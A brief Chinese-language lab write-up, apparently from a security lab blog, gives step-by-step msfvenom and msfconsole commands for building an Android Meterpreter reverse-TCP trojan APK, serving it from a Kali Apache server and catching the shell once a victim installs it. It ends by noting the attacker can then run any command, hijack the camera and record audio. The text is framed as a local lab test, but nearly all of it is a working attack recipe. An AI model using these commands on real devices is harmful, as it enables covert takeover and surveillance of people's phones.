實(shí)驗(yàn)環(huán)境:Kali Linux 2016.1;IP:192.168.0.105。
受害主機(jī):華為Ascend P7 Android 4.x;IP:192.168.0.102。
實(shí)驗(yàn)過(guò)程:
1.運(yùn)行msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105
LPORT=1234 R > test.apk;

2.運(yùn)行msfconsole,輸入use exploit/multi/handler;

3.執(zhí)行set PAYLOAD android/meterpreter/reverse_tcp;

4.執(zhí)行show options,將本地IP和端口號(hào)修改成和木馬一樣的參數(shù);

5.將test.apk通過(guò)Kali的apache服務(wù)器下載到受害主機(jī)上;

6.在metasploit中執(zhí)行exploit,之后在安卓手機(jī)中安裝test.apk;

7.可以看到,安裝apk之后,我們得到了受害主機(jī)的meterpreter;

8.我們可以在meterpreter下執(zhí)行任何命令,例如檢查是否root,列出當(dāng)前進(jìn)程,甚至劫持?jǐn)z像頭,錄制聲音等等。







Safesonic網(wǎng)絡(luò)安全實(shí)驗(yàn)室2016年08月13日